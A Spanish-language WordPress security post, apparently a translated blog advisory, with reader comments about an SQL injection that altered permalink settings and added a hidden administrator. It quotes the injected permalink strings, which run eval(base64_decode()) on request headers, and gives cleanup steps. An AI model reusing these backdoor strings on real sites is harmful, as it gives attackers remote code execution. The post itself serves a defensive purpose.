Muchos sitios están siendo afectados por un ataque SQL reciente donde se inyectan códigos en su sitio. Esta inyección de MySQL afecta sus enlaces permanentes haciéndolos ineficaces. Como resultado, las URL de sus publicaciones de blog no funcionarán. Numerosos blogs de WordPress fueron el objetivo de este ataque, Gracias a Andy Soward por llamar nuestra atención sobre esto.
Uno de los siguientes códigos se agregó a su estructura de permalinks debido a este ataque:
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
Estas comillas se agregaron a todos los permalinks de su sitio y solo se pueden cambiar si se eliminan manualmente.
Para solucionar esto, vaya a:
Configuración > Enlaces permanentes y elimine el código anterior y reemplace su código predeterminado.
Lo siguiente que debe hacer es ir a Usuarios. Verá que hay más de un administrador. No verá sus nombres listados, pero verá que el recuento aumentó. Así que lo que debe hacer es mirar a todos los usuarios y encontrar al último que se registró. Pase el mouse sobre ese usuario y obtenga el enlace. Cambie el código userid= sumando 1 a ese número. Entonces, si el último usuario que puede ver era el usuario #2, agréguele 1 y hágalo 3. Debería encontrar que el administrador oculto tiene un código extraño como nombre. Elimine el código y conviértalo en suscriptor. Luego regrese y elimínelo.
Esto debería solucionar el problema. También puede eliminarlo simplemente yendo a su PHPMyAdmin. Porque verá al usuario allí.
Queríamos difundir esta noticia lo antes posible, para que nuestros usuarios puedan estar actualizados. Por favor, asegúrense de que su blog no esté infectado. Esperamos que WordPress lance una actualización pronto.
Además, si aún no ha implementado algunas de estas medidas para asegurar su Área de administración de WordPress.
ahmed_alaaedin
La base de datos de mi sitio web fue inyectada hace unos días, añadiendo caracteres y palabras extrañas después de cada URL de publicación o página. No pude encontrar nada extraño en la configuración: permalinks o en el menú de usuarios. ¿Qué debo hacer para solucionar este problema, por favor? ¡Mi compañía de hosting tiene una copia de seguridad de la base de datos infectada también!
un usuario de wordpress
me pasó esto dos veces.
la primera vez fue una inyección sql del plugin wassup, esta vez no estoy seguro. mi proveedor de hosting me ha bloqueado.
una vez que restauren mi cuenta, desinstalaré wordpress... ¡Ya tuve suficiente!
Personal editorial
Quizás no sea culpa de WordPress, tal vez la seguridad de tu hosting simplemente no es tan buena...
Administrador
Joey
¿Qué averiguaste con esto? Me acaba de pasar lo mismo. Todos mis sitios de WP en mi cuenta están sufriendo el mismo problema.
lerrkin
Hola.
La URL interesante https://www.wpbeginner.com/wp-tutorials/11-vital-tips-and-hacks-to-protect-your-wordpress-admin-area/ enlazada desde aquí muestra una página en blanco.
El código contiene este comentario: ‘‘.
Ese es un error de WP Super Cache http://wordpress.org/support/topic/315446, y parece estar presente aquí… Así que actualiza WP Super Cache, por favor. Espero que leas estos consejos pronto
Personal editorial
Agradecemos mucho este comentario, el problema no era con WP Super Cache, creemos que fue el plugin llamado WP External Link. Desinstalamos y reinstalamos WP-Super Cache dos veces, pero luego comparamos el servidor de desarrollo donde todo funcionaba bien. La diferencia era este plugin. Cuando quitamos ese plugin, funcionó. Ahora puedes leer esa publicación.
Administrador
lerrkin
Quizás fue un conflicto entre WP External Link y Super Cache…
El texto era “Page not cached by WP Super Cache. No closing HTML tag. Check your theme”.
Veo que mi comentario HTML pegado de WP-Super-Cache funciona como comentario HTML y es invisible
Así que la última versión de Super Cache promete no hacer la verificación de validez HTML.
¡Oh, estoy leyendo!
¡Muchas gracias!
Roseli A. Bakar
Gracias por resaltar esto